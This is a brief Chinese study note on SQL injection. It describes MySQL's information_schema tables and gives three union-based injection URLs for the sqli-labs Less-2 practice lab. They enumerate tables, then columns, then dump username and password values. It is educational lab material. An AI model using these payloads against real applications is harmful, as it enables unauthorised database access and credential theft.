sqli笔记

MySQL数据库自带的数据库information_schema

里面有三个比较重要的表  SCHEMATA 、TABLES 、 COLUMNS  保存数据库所有的数据库名 表名  字段名

SCHEMATA->保存着数据库里所有的数据库的名字(包括自身)，通过这个表能查出所有数据库的名字！

 

 

 

TABLES->保存着所有数据库的所有表的名字

 

 

COLUMNS->保存着所有数据库的所有表的所有列的名字

 https://www.jianshu.com/p/393055d142ca

测试环境 sqli lession2

查出数据库security所有的表
http://127.0.0.1/sqli-labs/Less-2/?id=2 and 55=4 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'
数据库里面的所有表 emails,referers,uagents,users


查出users表里所有字段
http://127.0.0.1/sqli-labs/Less-2/?id=2 and 55=4 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'

id,username,password
查出users表里username password的值
http://127.0.0.1/sqli-labs/Less-2/?id=2 and 55=4 union select 1,group_concat(concat_ws(':',username,password)),3 from users